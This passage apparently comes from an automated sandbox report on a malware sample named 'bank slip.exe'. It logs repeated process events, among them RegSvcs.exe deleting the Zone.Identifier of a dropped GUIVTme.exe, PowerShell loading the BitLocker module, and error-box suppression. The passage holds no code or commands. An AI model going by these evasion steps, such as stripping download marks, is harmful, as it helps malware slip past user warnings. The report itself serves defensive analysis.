                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | delete
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
